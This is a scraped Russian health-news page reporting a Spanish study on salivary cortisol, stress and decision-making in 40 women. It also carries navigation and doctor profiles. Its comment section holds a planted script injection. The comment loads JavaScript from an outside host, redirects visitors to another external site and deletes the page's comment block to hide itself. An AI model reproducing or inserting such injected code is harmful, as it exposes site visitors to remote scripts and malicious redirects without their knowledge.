Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Теперь при приеме на рабо...  >>  Теперь при приеме на работу вы должны будете плюнуть
 
Обратная связь
 

Теперь при приеме на работу вы должны будете плюнуть

Размер шрифта
26 февраля 2013 00:00
Юрий Малышев
Здоровье инфо
Анна Белевская
Здоровье инфо
  • google_analytics: false
  • Нравится

Испанские ученые доказали, что по содержанию гормона кортизола в слюне можно судить о том, как человек реагирует на стрессовые ситуации.

теперь при приеме на работу вам нужно будет плюнуть

Кортизол – это стероидный гормон, который вырабатывается в коре надпочечников. Кортизол играет важную роль в работе опорно-двигательного аппарата, иммунной и нервной систем, в метаболизме белков, жиров и углеводов. Кроме того, кортизол называют гормоном стресса, поскольку он выделяется в ответ на стрессовое воздействие. Согласно последним данным, стресс влияет на способность к принятию решений. Оказывается, эту способность можно использовать для борьбы со стрессом.

В исследовании приняли участие 40 здоровых женщин. Сначала женщины выполнили игровое задание, направленное на развитие способности к принятию решений, а затем должны были выступить перед виртуальной аудиторией. Для того чтобы оценить реакцию женщин на стресс, ученые несколько раз измеряли уровень содержания кортизола в слюне.

«Полученные результаты свидетельствуют о том, что способность к принятию решений, которая играет главную роль в борьбе со стрессом, зависит от уровня кортизола. Чем ниже уровень кортизола, тем легче человек справляется со стрессом», – поясняет один из авторов исследования Изабель Перальта.

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 23:23

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Что с вами делает злость?   Что делать, если у вас стала ухудшаться память?   Можно ли заразиться стрессом? Ученые говорят – ДА! Как тут не психовать?   Что налить мужу на Новый год – ученые нашли ответ!  

Слайдшоу

1
Что съесть, чтобы не психовать Последствия ваших переживаний, которые хуже ваших переживаний
Так ли хороши диетические напитки? 10 причин напиться
Может ли кофе сжечь жир? Супереда для метаболизма
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.